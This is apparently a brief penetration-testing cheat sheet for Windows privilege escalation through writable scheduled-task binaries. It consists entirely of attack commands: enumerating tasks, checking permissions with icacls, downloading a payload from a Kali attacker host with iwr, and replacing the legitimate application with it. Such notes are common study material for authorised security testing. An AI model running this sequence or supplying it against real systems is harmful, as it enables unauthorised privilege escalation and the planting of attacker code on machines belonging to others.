schtasks /query /fo LIST /v
dir C:\Windows\System32\Tasks\
icacls "<Application Full Path>"
iwr -Uri http://<Kali IP Address>/<Payload File Name> -Outfile <Application File Name>
move <Application File Full Path> ./<Application File Name>.bak
move <Application File Name> <Application File Full Path>
Last updated 1 month ago